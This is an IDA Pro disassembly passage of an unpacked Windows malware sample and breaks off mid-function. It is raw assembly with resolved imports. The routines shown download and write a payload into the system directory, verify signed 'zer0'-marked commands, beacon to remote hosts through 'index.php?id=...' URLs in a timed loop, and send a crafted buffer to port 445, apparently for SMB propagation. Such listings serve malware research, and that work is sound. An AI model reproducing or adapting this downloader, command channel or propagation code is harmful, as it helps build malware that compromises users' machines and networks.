;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 46C57ACFB99DB66ECAA611E7EC5BAB98
; File Name : u:\work\46c57acfb99db66ecaa611e7ec5bab98_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dword_31421000 dd 77DDEAF4h ; resolved to->ADVAPI32.RegCreateKeyExAdword_31421004 dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExAdword_31421008 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_3142100C dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExA ; sub_31422882+1D�r
dword_31421010 dd 77DDEDE5h ; resolved to->ADVAPI32.RegDeleteValueAdword_31421014 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_31422882+4E�r ...
dword_31421018 dd 77E34D78h ; resolved to->ADVAPI32.AbortSystemShutdownAdword_3142101C dd 77DEA2F9h ; resolved to->ADVAPI32.CryptCreateHashdword_31421020 dd 77DEA122h ; resolved to->ADVAPI32.CryptHashDatadword_31421024 dd 77DEAB80h ; resolved to->ADVAPI32.CryptVerifySignatureAdword_31421028 dd 77DEA254h ; resolved to->ADVAPI32.CryptDestroyHashdword_3142102C dd 77DEA544h ; resolved to->ADVAPI32.CryptDestroyKeydword_31421030 dd 77DE8546h ; resolved to->ADVAPI32.CryptReleaseContextdword_31421034 dd 77DE7F96h ; resolved to->ADVAPI32.CryptAcquireContextAdword_31421038 dd 77DEA879h ; resolved to->ADVAPI32.CryptImportKey align 10h
dword_31421040 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_31421044 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_31421048 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_3142104C dd 7C80BAA1h ; resolved to->KERNEL32.lstrcmpiAdword_31421050 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_31421054 dd 7C86136Dh ; resolved to->KERNEL32.WinExecdword_31421058 dd 7C864B0Fh ; resolved to->KERNEL32.CreateToolhelp32Snapshotdword_3142105C dd 7C863DE5h ; resolved to->KERNEL32.Process32Firstdword_31421060 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_31421064 dd 7C863F58h ; resolved to->KERNEL32.Process32Nextdword_31421068 dd 7C80BE01h ; resolved to->KERNEL32.lstrcpyA ; sub_31422B67+8F�r
dword_3142106C dd 7C8308ADh ; resolved to->KERNEL32.CreateEventAdword_31421070 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_31421074 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileA ; sub_31422A9B+F�r
dword_31421078 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_3142107C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_314211A0+F6�r ...
dword_31421080 dd 7C801A24h ; resolved to->KERNEL32.CreateFileA ; sub_314221C4+57�r
dword_31421084 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenA ; sub_31421422+64�r ...
dword_31421088 dd 7C834D41h ; resolved to->KERNEL32.lstrcatA ; sub_31422A9B+40�r
dword_3142108C dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryA ; sub_31422A9B+1B�r
dword_31421090 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_31421094 dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_31421801+16C�r ...
dword_31421098 dd 7C80978Eh ; resolved to->KERNEL32.InterlockedExchangedword_3142109C dd 7C810111h ; resolved to->KERNEL32.lstrcpynAdword_314210A0 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcessdword_314210A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_31421DF0+2C�r
dword_314210A8 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_314223B2+116�r
dword_314210AC dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_314210B0 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcess ; sub_3142292E+92�r
dword_314210B4 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA ; UPX0:31422336�r
dword_314210B8 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCountdword_314210BC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_314210C0 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_31421F52+12�r
dword_314210C4 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_314210C8 dd 7C80A017h ; resolved to->KERNEL32.SetEventdword_314210CC dd 7C81320Ch ; resolved to->KERNEL32.OpenEventAdword_314210D0 dd 7C80C058h ; resolved to->KERNEL32.ExitThread ; sub_314221C4+66�r ...
dword_314210D4 dd 7C809766h ; resolved to->KERNEL32.InterlockedIncrement ; sub_314225C3+3F�r ...
dword_314210D8 dd 7C80180Eh ; resolved to->KERNEL32.ReadFiledword_314210DC dd 7C810A77h ; resolved to->KERNEL32.GetFileSizedword_314210E0 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_31422A9B+C3�r
dword_314210E4 dd 7C910331h, 0 ; resolved to->NTDLL.RtlGetLastWin32Errordword_314210EC dd 77C371BCh ; resolved to->MSVCRT.sranddword_314210F0 dd 77C46F70h ; resolved to->MSVCRT.memcpydword_314210F4 dd 77C478A0h ; resolved to->MSVCRT.strlendword_314210F8 dd 77C475F0h ; resolved to->MSVCRT.memsetdword_314210FC dd 77C371D3h ; resolved to->MSVCRT.rand ; sub_31421F73:loc_31421F84�r ...
; ---------------------------------------------------------------------------
loc_31421100: ; DATA XREF: UPX0:loc_31422CD0�r
xchg eax, esp
pop esp
retn
; ---------------------------------------------------------------------------
db 77h
dword_31421104 dd 77C47C60h ; resolved to->MSVCRT.strstr ; sub_3142207E:loc_314220AF�r ...
dword_31421108 dd 77C47660h ; resolved to->MSVCRT.strchr ; sub_31421422+AA�r
align 10h
dword_31421110 dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_31421114 dd 7E41BE4Bh ; resolved to->USER32.GetForegroundWindowdword_31421118 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessIddword_3142111C dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_314215C7+77�r ...
dd 0
dword_31421124 dd 42C30BFAh ; resolved to->WININET.InternetOpenUrlA ; sub_314215C7+9D�r
dword_31421128 dd 42C2C8A1h ; resolved to->WININET.InternetOpenA ; sub_314215C7+89�r
dword_3142112C dd 42C1DAC1h ; resolved to->WININET.InternetCloseHandledword_31421130 dd 42C367F6h ; resolved to->WININET.InternetGetConnectedState ; UPX0:314227A2�r
dword_31421134 dd 42C2ABF4h ; resolved to->WININET.InternetReadFile ; sub_314215C7+B0�r
dd 0
dword_3142113C dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_31421140 dd 71AB3E00h ; resolved to->WS2_32.binddword_31421144 dd 71AB88D3h ; resolved to->WS2_32.listendword_31421148 dd 71AC1028h ; resolved to->WS2_32.acceptdword_3142114C dd 71AB50C8h ; resolved to->WS2_32.gethostnamedword_31421150 dd 71AB94DCh ; resolved to->WS2_32.WSAGetLastErrordword_31421154 dd 71AB4FD4h ; resolved to->WS2_32.gethostbynamedword_31421158 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_314221C4+AC�r
dword_3142115C dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_31422712+D�r
dword_31421160 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; sub_314221C4+F0�r
dword_31421164 dd 71AB406Ah ; resolved to->WS2_32.connectdword_31421168 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_3142207E+67�r ...
dword_3142116C dd 71AB615Ah ; resolved to->WS2_32.recv ; sub_31421801+1D8�r ...
dword_31421170 dd 71AC0BDEh ; resolved to->WS2_32.shutdown ; sub_3142207E+128�r
dword_31421174 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_3142207E+12F�r
align 10h
dword_31421180 dd 0FFFFFFFFh, 0 dd offset nullsub_1
align 10h
dword_31421190 dd 0FFFFFFFFh, 0 dd offset nullsub_2
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314211A0 proc near ; CODE XREF: sub_31421422+16D�p
var_110 = byte ptr -110h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 110h
push ebx
push esi
xor esi, esi
push edi
push esi
push esi
push esi
push 1
push offset aMozilla4_0Comp ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
mov ebx, eax
cmp ebx, esi
jnz short loc_314211CB
push 1
jmp loc_31421261
; ---------------------------------------------------------------------------
loc_314211CB: ; CODE XREF: sub_314211A0+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_3142108C ; GetSystemDirectoryA
mov edi, dword_31421088
lea eax, [ebp+var_110]
push offset dword_314241F8
push eax
call edi ; dword_31421088
lea eax, [ebp+var_110]
push 6
push eax
call dword_31421084 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31421F73
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset dword_314241F0
push eax
call edi ; dword_31421088
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_31421080 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_31421241
push 2
jmp short loc_31421261
; ---------------------------------------------------------------------------
loc_31421241: ; CODE XREF: sub_314211A0+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_31421124 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31421264
push [ebp+var_4]
call dword_3142107C ; CloseHandle
push 3
loc_31421261: ; CODE XREF: sub_314211A0+26�j
; sub_314211A0+9F�j
pop eax
jmp short loc_314212B5
; ---------------------------------------------------------------------------
loc_31421264: ; CODE XREF: sub_314211A0+B4�j
mov edi, 100000h
push edi
call sub_31422CA5
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31421134 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_31421078 ; WriteFile
push [ebp+var_4]
call dword_3142107C ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31421FA3
push ebx
call sub_31422CB9
add esp, 0Ch
xor eax, eax
loc_314212B5: ; CODE XREF: sub_314211A0+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_314211A0 endp
; =============== S U B R O U T I N E =======================================
sub_314212BA proc near ; CODE XREF: sub_31421422+F8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = byte ptr 0Ch
mov ecx, [esp+arg_4]
mov eax, [esp+arg_0]
push ebx
push esi
push edi
or edi, 0FFFFFFFFh
inc eax
push 0Fh
lea esi, [ecx+1]
sub edi, ecx
pop ecx
loc_314212D1: ; CODE XREF: sub_314212BA+56�j
mov dl, [eax]
mov bl, [eax-1]
add edx, ecx
add bl, cl
sar edx, 4
and dl, 3
sub dl, [esp+0Ch+arg_8]
shl bl, 2
or dl, bl
mov [esi-1], dl
mov dl, [eax+1]
mov bl, [eax]
dec dl
add bl, cl
and dl, cl
sub dl, [esp+0Ch+arg_8]
add eax, 3
shl bl, 4
and bl, 0F0h
or dl, bl
mov [esi], dl
inc esi
inc esi
lea edx, [edi+esi]
cmp edx, 30h
jl short loc_314212D1
pop edi
pop esi
pop ebx
retn
sub_314212BA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421316 proc near ; CODE XREF: sub_3142139B+27�p
var_38 = byte ptr -38h
var_1C = byte ptr -1Ch
arg_0 = byte ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
push 6
pop ecx
mov esi, offset aAbcdefghijklmn ; "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lea edi, [ebp+var_1C]
push 6
rep movsd
movsw
movsb
pop ecx
mov esi, offset aAbcdefghijkl_0 ; "abcdefghijklmnopqrstuvwxyz"
lea edi, [ebp+var_38]
mov ebx, [ebp+arg_4]
rep movsd
movsw
test ebx, ebx
movsb
jge short loc_31421349
add ebx, 1Ah
loc_31421349: ; CODE XREF: sub_31421316+2E�j
movsx edi, [ebp+arg_0]
mov esi, dword_31421108
lea eax, [ebp+var_1C]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421373
lea ecx, [ebp+var_1C]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_1C]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421373: ; CODE XREF: sub_31421316+48�j
lea eax, [ebp+var_38]
push edi
push eax
call esi ; dword_31421108
pop ecx
test eax, eax
pop ecx
jz short loc_31421393
lea ecx, [ebp+var_38]
push 1Ah
sub eax, ecx
pop ecx
add eax, ebx
cdq
idiv ecx
mov al, [ebp+edx+var_38]
jmp short loc_31421396
; ---------------------------------------------------------------------------
loc_31421393: ; CODE XREF: sub_31421316+68�j
mov al, [ebp+arg_0]
loc_31421396: ; CODE XREF: sub_31421316+5B�j
; sub_31421316+7B�j
pop edi
pop esi
pop ebx
leave
retn
sub_31421316 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142139B proc near ; CODE XREF: sub_31421422+D6�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov eax, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov al, [eax]
test al, al
jz short loc_314213F8
mov edi, [ebp+arg_0]
push ebx
loc_314213B0: ; CODE XREF: sub_3142139B+58�j
sub al, 2
inc [ebp+arg_4]
mov bl, al
mov eax, esi
neg eax
mov byte ptr [ebp+arg_0], bl
push eax
push [ebp+arg_0]
call sub_31421316
mov [edi], al
pop ecx
inc edi
cmp bl, 61h
pop ecx
jl short loc_314213DC
cmp bl, 7Ah
jg short loc_314213DC
movsx esi, bl
sub esi, 61h
loc_314213DC: ; CODE XREF: sub_3142139B+34�j
; sub_3142139B+39�j
cmp bl, 41h
jl short loc_314213EC
cmp bl, 5Ah
jg short loc_314213EC
movsx esi, bl
sub esi, 41h
loc_314213EC: ; CODE XREF: sub_3142139B+44�j
; sub_3142139B+49�j
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jnz short loc_314213B0
pop ebx
jmp short loc_314213FB
; ---------------------------------------------------------------------------
loc_314213F8: ; CODE XREF: sub_3142139B+F�j
mov edi, [ebp+arg_0]
loc_314213FB: ; CODE XREF: sub_3142139B+5B�j
and byte ptr [edi], 0
pop edi
pop esi
pop ebp
retn
sub_3142139B endp
; =============== S U B R O U T I N E =======================================
sub_31421402 proc near ; CODE XREF: sub_31421422+104�p
arg_0 = dword ptr 4
xor eax, eax
xor ecx, ecx
loc_31421406: ; CODE XREF: sub_31421402+12�j
mov edx, [esp+arg_0]
movzx edx, byte ptr [ecx+edx]
add eax, edx
inc ecx
cmp ecx, 30h
jl short loc_31421406
push 1Ah
cdq
pop ecx
idiv ecx
mov eax, edx
add eax, 61h
retn
sub_31421402 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421422 proc near ; CODE XREF: sub_314215C7+BA�p
var_174 = dword ptr -174h
var_170 = byte ptr -170h
var_168 = byte ptr -168h
var_164 = byte ptr -164h
var_134 = dword ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_11C = byte ptr -11Ch
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_31421180
push offset loc_31422CD0
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 164h
push ebx
push esi
push edi
mov [ebp+var_128], 1
and [ebp+var_4], 0
push offset aZer0 ; "zer0"
push [ebp+arg_0]
call dword_31421104 ; strstr
pop ecx
pop ecx
mov edi, eax
mov [ebp+var_130], edi
test edi, edi
jz loc_314215A8
add edi, 4
mov [ebp+var_130], edi
jz loc_314215A8
push edi
call dword_31421084 ; lstrlenA
mov [ebp+var_1C], eax
cmp eax, 50h
jle loc_314215A8
and byte ptr [edi+100h], 0
mov al, [edi]
mov [ebp+var_168], al
movsx ebx, al
sub ebx, 61h
mov [ebp+var_12C], ebx
js loc_314215A8
cmp ebx, 1Ah
jge loc_314215A8
inc edi
mov [ebp+var_130], edi
push 7Eh
push edi
call dword_31421108 ; strchr
pop ecx
pop ecx
mov esi, eax
mov [ebp+var_134], esi
test esi, esi
jz loc_314215A8
mov al, [esi]
mov [ebp+var_170], al
and byte ptr [esi], 0
push ebx
push edi
lea eax, [ebp+var_11C]
push eax
call sub_3142139B
mov al, [ebp+var_170]
mov [esi], al
inc esi
mov [ebp+var_130], esi
xor edi, edi
push edi
lea eax, [ebp+var_164]
push eax
lea eax, [esi+1]
push eax
call sub_314212BA
lea eax, [ebp+var_164]
push eax
call sub_31421402
add esp, 1Ch
cmp [esi], al
jnz short loc_314215A8
push 44h
push offset dword_31424000
lea eax, [ebp+var_124]
push eax
call sub_3142172F
add esp, 0Ch
lea eax, [ebp+var_174]
push eax
push 30h
lea eax, [ebp+var_164]
push eax
lea eax, [ebp+var_11C]
push eax
call dword_31421084 ; lstrlenA
push eax
lea eax, [ebp+var_11C]
push eax
lea eax, [ebp+var_124]
push eax
call sub_3142179A
add esp, 18h
test eax, eax
jnz short loc_3142159B
cmp [ebp+var_174], edi
jz short loc_3142159B
lea eax, [ebp+var_11C]
push eax
call sub_314211A0
pop ecx
mov [ebp+var_128], edi
loc_3142159B: ; CODE XREF: sub_31421422+15C�j
; sub_31421422+164�j
lea eax, [ebp+var_124]
push eax
call sub_3142177E
pop ecx
loc_314215A8: ; CODE XREF: sub_31421422+4E�j
; sub_31421422+5D�j ...
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
mov eax, [ebp+var_128]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31421422 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_314215C7 proc near ; CODE XREF: sub_314216A2+2A�p
var_E8 = byte ptr -0E8h
var_84 = byte ptr -84h
var_4 = byte ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
push edi
push 4000h
call sub_31422CA5
pop ecx
mov esi, eax
lea eax, [ebp+var_E8]
push 63h
push eax
push 7
push 400h
call dword_31421090 ; GetLocaleInfoA
xor ebx, ebx
cmp byte ptr [ebp+arg_4], bl
jz short loc_3142162F
lea eax, [ebp+var_E8]
push eax
lea eax, [ebp+var_84]
push dword_31424FEC
push dword_31425004
push offset aFgnsdrjyrsert ; "fgnsdrjyrsert"
push [ebp+arg_0]
push offset aHttpSIndex_php ; "http://%s/index.php?id=%s&scn=%d&inf=%d"...
push eax
call dword_3142111C ; wsprintfA
add esp, 1Ch
jmp short loc_31421647
; ---------------------------------------------------------------------------
loc_3142162F: ; CODE XREF: sub_314215C7+34�j
push [ebp+arg_0]
lea eax, [ebp+var_84]
push offset aHttpS ; "http://%s"
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
loc_31421647: ; CODE XREF: sub_314215C7+66�j
push ebx
push ebx
push ebx
push ebx
push offset aMozilla4_0Co_0 ; "Mozilla/4.0 (compatible; MSIE 6.0; Wind"...
call dword_31421128 ; InternetOpenA
push ebx
mov edi, eax
push ebx
push ebx
lea eax, [ebp+var_84]
push ebx
push eax
push edi
call dword_31421124 ; InternetOpenUrlA
mov ebx, eax
lea eax, [ebp+var_4]
push eax
push 2000h
push esi
push ebx
call dword_31421134 ; InternetReadFile
push esi
mov [ebp+arg_4], eax
call sub_31421422
push esi
call sub_31422CB9
mov esi, dword_3142112C
pop ecx
pop ecx
push ebx
call esi ; dword_3142112C
push edi
call esi ; dword_3142112C
mov eax, [ebp+arg_4]
pop edi
pop esi
pop ebx
leave
retn
sub_314215C7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_314216A2 proc near ; DATA XREF: sub_314223B2+15B�o
push ebx
mov ebx, dword_31421098
push esi
push edi
loc_314216AB: ; CODE XREF: sub_314216A2+88�j
xor esi, esi
mov edi, 46021h
loc_314216B2: ; CODE XREF: sub_314216A2+86�j
inc esi
inc esi
call sub_31422038
test eax, eax
jz short loc_314216FC
mov al, byte_31424080[esi+esi*4]
push eax
push off_31424081[esi+esi*4]
call sub_314215C7
or eax, edi
pop ecx
xor eax, 8064h
pop ecx
shl eax, 3
mov edi, eax
xor eax, 228h
test ax, 0FFFFh
jnz short loc_314216FC
push 0
push offset dword_31425004
call ebx ; dword_31421098
push 0
push offset dword_31424FEC
call ebx ; dword_31421098
loc_314216FC: ; CODE XREF: sub_314216A2+19�j
; sub_314216A2+46�j
call dword_314210FC ; rand
push 3
cdq
pop ecx
idiv ecx
add esi, edx
call sub_31422068
xor edx, edx
mov ecx, 493E0h
div ecx
add edx, 61B48h
push edx
call dword_31421094 ; Sleep
cmp esi, 16h
jb short loc_314216B2
jmp loc_314216AB
sub_314216A2 endp
; =============== S U B R O U T I N E =======================================
sub_3142172F proc near ; CODE XREF: sub_31421422+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push ebx
mov ebx, [esp+4+arg_0]
push esi
mov esi, dword_31421034
push edi
xor edi, edi
push edi
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 8
push 1
push edi
push edi
push ebx
call esi ; dword_31421034
test eax, eax
jnz short loc_3142175C
push 1
pop eax
jmp short loc_3142177A
; ---------------------------------------------------------------------------
loc_3142175C: ; CODE XREF: sub_3142172F+19�j
; sub_3142172F+26�j
lea eax, [ebx+4]
push eax
push edi
push edi
push [esp+18h+arg_8]
push [esp+1Ch+arg_4]
push dword ptr [ebx]
call dword_31421038 ; CryptImportKey
neg eax
sbb eax, eax
and al, 0FEh
inc eax
inc eax
loc_3142177A: ; CODE XREF: sub_3142172F+2B�j
pop edi
pop esi
pop ebx
retn
sub_3142172F endp
; =============== S U B R O U T I N E =======================================
sub_3142177E proc near ; CODE XREF: sub_31421422+180�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push dword ptr [esi+4]
call dword_3142102C ; CryptDestroyKey
push 0
push dword ptr [esi]
call dword_31421030 ; CryptReleaseContext
xor eax, eax
pop esi
retn
sub_3142177E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3142179A proc near ; CODE XREF: sub_31421422+152�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
lea eax, [ebp+arg_0]
xor edi, edi
push eax
push edi
push edi
push 8003h
push dword ptr [esi]
call dword_3142101C ; CryptCreateHash
test eax, eax
jnz short loc_314217C0
push 1
pop eax
jmp short loc_314217FD
; ---------------------------------------------------------------------------
loc_314217C0: ; CODE XREF: sub_3142179A+1F�j
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_31421020 ; CryptHashData
test eax, eax
jnz short loc_314217D9
push 2
pop edi
jmp short loc_314217F2
; ---------------------------------------------------------------------------
loc_314217D9: ; CODE XREF: sub_3142179A+38�j
push edi
push edi
push dword ptr [esi+4]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_0]
call dword_31421024 ; CryptVerifySignatureA
mov ecx, [ebp+arg_14]
mov [ecx], eax
loc_314217F2: ; CODE XREF: sub_3142179A+3D�j
push [ebp+arg_0]
call dword_31421028 ; CryptDestroyHash
mov eax, edi
loc_314217FD: ; CODE XREF: sub_3142179A+24�j
pop edi
pop esi
pop ebp
retn
sub_3142179A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31421801 proc near ; CODE XREF: sub_3142255F+36�p
; sub_314225C3+48�p ...
var_89E4 = byte ptr -89E4h
var_897C = byte ptr -897Ch
var_690C = byte ptr -690Ch
var_689C = byte ptr -689Ch
var_5DD8 = byte ptr -5DD8h
var_4834 = byte ptr -4834h
var_4833 = byte ptr -4833h
var_37A0 = byte ptr -37A0h
var_2CDC = byte ptr -2CDCh
var_2CDB = byte ptr -2CDBh
var_2CD8 = byte ptr -2CD8h
var_24F4 = byte ptr -24F4h
var_24E4 = byte ptr -24E4h
var_21C0 = byte ptr -21C0h
var_21BC = byte ptr -21BCh
var_21B0 = byte ptr -21B0h
var_1F28 = byte ptr -1F28h
var_1EAC = byte ptr -1EACh
var_16DC = byte ptr -16DCh
var_1231 = byte ptr -1231h
var_F44 = byte ptr -0F44h
var_EA4 = byte ptr -0EA4h
var_798 = dword ptr -798h
var_788 = byte ptr -788h
var_774 = byte ptr -774h
var_730 = byte ptr -730h
var_134 = byte ptr -134h
var_133 = byte ptr -133h
var_E4 = byte ptr -0E4h
var_E1 = byte ptr -0E1h
var_B7 = byte ptr -0B7h
var_B5 = byte ptr -0B5h
var_B4 = byte ptr -0B4h
var_6C = byte ptr -6Ch
var_4C = byte ptr -4Ch
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_6 = byte ptr -6
var_5 = byte ptr -5
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 89E4h
call sub_31422CF0
mov eax, dword_31424C84
push ebx
push edi
push 1
pop edi
xor ebx, ebx
mov [ebp+var_14], eax
mov eax, dword_31424C88
push ebx
push edi
push 2
mov [ebp+var_10], eax
mov [ebp+var_C], edi
call dword_31421158 ; socket
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_31421D61
push esi
mov esi, [ebp+arg_0]
push 1Dh
push esi
call dword_3142115C ; inet_ntoa
push eax
lea eax, [ebp+var_6C]
push eax
call dword_3142109C ; lstrcpynA
lea eax, [ebp+var_6C]
push eax
lea eax, [ebp+var_4C]
push offset loc_31424C78
push eax
call dword_3142111C ; wsprintfA
add esp, 0Ch
xor ecx, ecx
lea eax, [ebp+var_133]
loc_31421874: ; CODE XREF: sub_31421801+83�j
mov dl, [ebp+ecx+var_4C]
mov [eax-1], dl
and byte ptr [eax], 0
inc ecx
inc eax
inc eax
cmp ecx, 28h
jl short loc_31421874
push 60h
lea eax, [ebp+var_E4]
push offset dword_31424798
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl eax, 1
push eax
lea eax, [ebp+var_134]
push eax
lea eax, [ebp+var_B4]
push eax
call sub_31422CE2 ; memcpy
add esp, 1Ch
lea eax, [ebp+var_4C]
push 9
push (offset aC+3)
push eax
call sub_31422CDC ; strlen
pop ecx
lea eax, [ebp+eax*2+var_B5]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
add al, 1Ah
push edi
shl al, 1
mov [ebp+var_5], al
lea eax, [ebp+var_5]
push eax
lea eax, [ebp+var_E1]
push eax
call sub_31422CE2 ; memcpy
lea eax, [ebp+var_4C]
push eax
call sub_31422CDC ; strlen
shl al, 1
add al, 9
push edi
mov [ebp+var_6], al
lea eax, [ebp+var_6]
push eax
lea eax, [ebp+var_B7]
push eax
call sub_31422CE2 ; memcpy
push 0E29h
lea eax, [ebp+var_1F28]
push 31h
push eax
call sub_31422CD6 ; memset
push 10h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_31422CD6 ; memset
add esp, 44h
mov [ebp+var_24], 2
push 1BDh
call dword_31421160 ; ntohs
mov [ebp+var_22], ax
lea eax, [ebp+var_24]
push 10h
push eax
push [ebp+var_4]
mov [ebp+var_20], esi
call dword_31421164 ; connect
cmp eax, 0FFFFFFFFh
jz loc_31421D57
mov esi, dword_31421094
mov edi, 0C8h
push edi
call esi ; dword_31421094
push ebx
mov ebx, dword_31421168
push 89h
push offset dword_31424580
push [ebp+var_4]
call ebx ; dword_31421168
push edi
